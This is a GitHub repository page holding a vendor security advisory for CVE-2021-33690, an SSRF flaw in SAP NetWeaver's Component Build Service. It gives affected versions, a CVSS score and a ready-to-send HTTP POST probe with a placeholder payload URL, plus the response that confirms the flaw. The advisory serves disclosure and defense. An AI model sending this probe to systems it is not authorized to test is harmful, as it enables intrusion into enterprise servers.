Skip to content

[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure

Notifications You must be signed in to change notification settings

redrays-io/CVE-2021-33690

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

CVE-2021-33690

[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure

Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

ADVISORY INFORMATION
Title: [CVE-2021-33690] Server-Side Request Forgery Vulnerability in SAP NetWeaver Development Infrastructure
Risk: Critical
Advisory URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Date published: June 1, 2023

VULNERABILITY INFORMATION
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information
CVSS v3.1 Base Score: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

VULNERABILITY DESCRIPTION
A vulnerability known as Server-Side Request Forgery (SSRF) has been identified in various versions of the 
SAP NetWeaver Development Infrastructure Component Build Service, namely 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50.
This weakness within the SAP NetWeaver Development Infrastructure Component Build Service gives an attacker,
who has server access, the ability to execute proxy attacks via specially tailored queries. The aftermath of 
such attacks can lead to the complete compromise of sensitive server data, affecting its accessibility. 
It’s crucial to note that the severity of this vulnerability is contingent on whether the SAP NetWeaver 
Development Infrastructure (NWDI) operates on the intranet or the internet. The CVSS score has been calculated based 
on the worst-case situation, which presumes it operates online.

TECHNICAL DESCRIPTION

To determine if the server is vulnerable to SSRF, send the following request:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

If the following response is received, it implies the presence of the vulnerability:

<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>


About RedRays
RedRays is a premier cybersecurity enterprise that safeguards ERP systems against internal fraudulent 
activities and external cyber threats. We take pride in delivering robust security solutions for large 
corporations and managed service providers that depend on major ERP systems like SAP, Oracle, and Microsoft. 
Utilizing advanced tools and strategies, we proactively supervise and control security in extensive 
SAP environments globally.

Our primary goal is to bridge the security gap from both a technical and business perspective, ensuring our 
clients’ seamless operations and safeguarding their precious data. We at RedRays, are committed to upholding
top-tier security standards while providing extraordinary client service and assistance.

About RedRays R&D
The cornerstone of RedRays’ accomplishments lies in our research and development (R&D) unit, specializes in 
studying and analyzing vulnerabilities in essential corporate applications. Our R&D initiatives have earned 
acknowledgment and admiration from leading software firms such as SAP, Oracle, Microsoft Dynamics, and IBM.
This dedication to research enables us to anticipate emerging threats and craft bespoke security solutions
that cater to our clients’ needs.

Our team comprises seasoned professionals with diverse skill sets spanning various security domains, 
such as vulnerability evaluation, penetration testing, incident management, and threat intelligence. 
Our commitment is to perform rigorous research and deliver avant-garde solutions to fortify SAP systems 
against ever-changing threats.

Contact RedRays

For any questions or further details, don't hesitate to reach out:

About

[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published